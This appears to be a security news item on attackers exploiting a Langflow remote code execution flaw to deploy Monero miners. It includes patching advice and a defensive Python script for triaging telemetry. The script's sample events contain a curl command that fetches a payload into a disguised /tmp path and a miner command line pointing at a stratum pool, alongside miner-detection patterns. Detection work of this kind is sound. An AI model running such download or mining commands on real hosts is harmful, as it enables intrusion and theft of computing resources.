Threat actors are actively exploiting a critical remote code execution vulnerability in Langflow, the popular open-source AI application development platform, to compromise exposed endpoints and deploy Monero cryptocurrency mining software.

The campaign weaponizes CVE-2026-33017, which carries a CVSS score of 9.3, reflecting the severity of the flaw. The vulnerability allows unauthenticated attackers to execute arbitrary code on affected Langflow instances, requiring no credentials or prior access to the targeted system.

Active Scanning and Exploitation

Researchers have observed threat actors conducting opportunistic scanning for publicly exposed Langflow deployments. Once a vulnerable instance is identified, attackers exploit the RCE flaw to gain execution on the host and then deploy a Monero miner. Monero is a common payload choice because its privacy-focused design makes transaction tracing significantly more difficult than with other cryptocurrencies.

The targeting of AI application infrastructure is consistent with a broader trend of attackers probing newly exposed attack surfaces created by the rapid deployment of AI development tools, many of which are stood up quickly and without hardened security configurations.

Recommendations

Security teams running Langflow instances should take the following steps immediately:

  • Apply available patches or updates to address CVE-2026-33017 without delay.
  • Audit network exposure and ensure Langflow instances are not publicly accessible unless strictly necessary.
  • Review host-based telemetry for signs of unauthorized process execution or anomalous outbound network connections indicative of mining activity.
  • Implement authentication controls and network segmentation around AI development infrastructure.
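
The telemetry review in the third step can be sketched as a small triage script. This is an added example, not code from the researchers or the Langflow project. The event schema, the `langflow` parent process name, the port list and all sample events are constructed assumptions to adapt to your own EDR or auditd export.

```python
import json
import re

# Constructed sample telemetry, one JSON event per line. Field names are an
# assumed schema; addresses are documentation ranges, the wallet is a placeholder.
SAMPLE_EVENTS = """\
{"type":"process","pid":4110,"parent":"systemd","image":"/usr/bin/python3","cmdline":"python3 -m langflow run"}
{"type":"process","pid":4377,"parent":"langflow","image":"/bin/sh","cmdline":"sh -c curl -s http://203.0.113.7/x -o /tmp/.cache/kworker"}
{"type":"process","pid":4402,"parent":"sh","image":"/tmp/.cache/kworker","cmdline":"/tmp/.cache/kworker -o stratum+tcp://pool.example:3333 -u WALLET_PLACEHOLDER --donate-level 1"}
{"type":"network","pid":4402,"dst":"198.51.100.20","dport":3333}
{"type":"network","pid":4110,"dst":"192.0.2.10","dport":443}
"""

SERVICE_PARENTS = {"langflow"}  # assumed process name of the Langflow service
SHELLS_AND_FETCHERS = {"sh", "bash", "dash", "curl", "wget"}
# Stratum URL schemes and miner-style options; a heuristic, not an IoC list.
MINER_CMDLINE = re.compile(r"stratum\+(tcp|ssl)://|--donate-level|xmrig", re.I)
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
POOL_PORTS = {3333, 4444, 5555}  # ports often used by mining pools (assumption)


def triage(raw):
    """Return sorted (pid, reason) findings for miner-like behaviour."""
    findings = set()
    for line in raw.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["type"] == "process":
            name = ev["image"].rsplit("/", 1)[-1]
            # An application server should not normally spawn shells or fetchers.
            if ev["parent"] in SERVICE_PARENTS and name in SHELLS_AND_FETCHERS:
                findings.add((ev["pid"], "shell or downloader spawned by Langflow service"))
            if MINER_CMDLINE.search(ev["cmdline"]):
                findings.add((ev["pid"], "miner-style command line"))
            if ev["image"].startswith(WRITABLE_DIRS):
                findings.add((ev["pid"], "binary executed from world-writable directory"))
        elif ev["type"] == "network" and ev["dport"] in POOL_PORTS:
            findings.add((ev["pid"], "outbound connection to common mining-pool port"))
    return sorted(findings)


if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_EVENTS):
        print(pid, reason)
```

A process that trips more than one rule, such as PID 4402 in the sample, is the strongest lead; a single port match on its own is weak evidence.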

The continued exploitation of this flaw underscores that threat actors are monitoring disclosures closely and moving quickly against AI tooling that organizations may not be treating with the same urgency as traditional enterprise software.